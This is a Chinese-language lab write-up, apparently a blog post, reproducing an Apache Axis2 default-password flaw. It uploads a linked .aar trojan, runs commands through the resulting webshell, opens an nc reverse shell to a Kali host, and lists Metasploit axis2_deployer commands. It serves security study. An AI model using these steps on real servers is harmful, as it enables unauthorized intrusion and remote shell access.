介绍

Axis2 Web 管理模块是一个下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。

环境介绍

主机 IP
靶机 192.168.30.134
kali 192.168.30.128

靶机

链接:https://pan.baidu.com/s/1oz8LrApwYolS2orgJCT8yw
提取码:1234

发现漏洞

使用扫描器发现漏洞,发现可以利用

开始复现

使用admin和默认密码登陆axis2。

发现漏洞上传点。


aar木马下载:

链接:https://pan.baidu.com/s/1_z6BQay90_TA1yURO9_z3A
提取码:1234

上传木马文件

执行命令
http://192.168.30.134/axis2/services/Cat/exec?cmd=ifconfig

反弹shell

使用nc监听端口1111

nc -lvp 1111


使用命令进行反弹shell

http://192.168.30.134/axis2/services/Cat/shell?host=192.168.30.128&port=1111


Meterpreter复现

msfconsole
use exploit/multi/http/axis2_deployer
msf6 exploit(multi/http/axis2_deployer) > set rhosts 192.168.30.134
msf6 exploit(multi/http/axis2_deployer) > set rport 80
msf6 exploit(multi/http/axis2_deployer) > exploit

axis2弱密码漏洞复现相关推荐

  1. Tomcat 弱口令漏洞复现

    目录 漏洞介绍 弱口令 弱口令的危害 靶场部署 设备信息 靶场搭建 漏洞复现 访问主页 访问默认后台地址 抓包获取加密格式 使用BurpSuite爆破使用base64加密的用户名和密码 使用冰蝎连接 ...

  2. tomcat8弱口令漏洞复现与getshell

    目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用默认用户名密码tomcat:tomcat登录http://your-ip:8080/manager/html 2.上传we ...

  3. 东方通中间件弱密码漏洞检测方法

    1.东方通中间件的默认管理端口为9060,可以采用扫描工具扫出一个IP范围内9060端口的IP地址. 2.更进一步,可以访问所有开放的端口:   http://ip:port/console/  如果 ...

  4. DebeCMS环境搭建以及漏洞复现

    文章目录 前言 一.环境搭建   首页访问慢解决方案 二.漏洞分析以及复现   任意修改前台用户密码   cookie伪造任意前台用户登录   前台文件上传漏洞   任意重置后台用户密码   后台任意 ...

  5. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

  6. MySQL弱密码和webshell

    MySQL弱密码和webshell问题文档 一.了解漏洞 1.mysql是什么 MySQL 是最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational ...

  7. SSH协议弱加密算法漏洞的利用及复现(中间人攻击)

    SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...

  8. Apache Axis2 后台文件上传getshell 漏洞复现

    0x00 前言 Apache Axis2是一个Web服务的核心支援引擎.AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本. 事实上AXIS2 不只为WEB应用程序提供We ...

  9. DeDeCMS v5.7 SP2正式版 前台任意用户密码修改 漏洞复现

    漏洞限制 1. 只影响前台账户 2. 只能修改未设置安全问题的账户. 影响版本 DeDeCMSV5.7SP2正式版(2018-01-09) 复现环境及工具 ⒈环境 PHP 5.6 DeDeCMSV5. ...

  10. DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现

    DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现 一.漏洞概述 1.简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内最知名的 PHP 开源网站管理系统, ...

最新文章

  1. 【并行计算-CUDA开发】从零开始学习OpenCL开发(一)架构
  2. Centos7安装Python3.6
  3. Oracle入门(十四.22)之创建DDL和数据库事件触发器
  4. Windows与Linux下进程间通信技术比较
  5. 8个最高效的Python爬虫框架,你用过几个?
  6. [算法 笔记]2014年去哪儿网 开发笔试(续)第一题BUG修正
  7. 2怎么开机_MacBook如何取消开盖自动开机
  8. MyEclipse6.5注册码(转)
  9. c语言内循环外循环怎么使用,开高速, 用内循环还是外循环? 教你正确使用内外循环!...
  10. 突然想起来几年前我写的 !
  11. 从物理页面的争抢看linux内核内存管理
  12. colmap 稀疏重建输出的cameras.txt, images.txt,points3D.txt含义
  13. java中laber字体颜色设置,QLabel:设置文本和背景的颜色
  14. 田野调查手记·浮山摩崖石刻(十四)
  15. js破解 X笔网登录
  16. M1 芯片版 Mac 抹掉重装系统教程
  17. 和平精英修改服务器内存,和平精英极限帧率怎么调 极限帧率修改攻略[多图]
  18. TypeError: an integer is required (got type bytes)
  19. 数据库同步有哪些方式?【怎么保障目标和源数据一致性】
  20. 实现类似IE的松散耦合(Loosely-Coupled )效果——Window Tabifier

热门文章

  1. JAVA:实现解析纯真IP数据库
  2. elk logstach收集交换机日志
  3. 惠普打印机驱动程序安装失败解决
  4. SolidWorks修改工程图中文字字体的方法
  5. charrnn 诗歌_代码不是诗歌,它只是代码
  6. 六、鼎捷T100生产管理之生产入库管理篇
  7. html5制作人物动作,骨骼动画制作新利器:快速制作动作人物动画,省时简单!...
  8. Java8遍历Map、Map转List、List转Map
  9. Map转换List一些方法
  10. 基于微信小程序的商城设计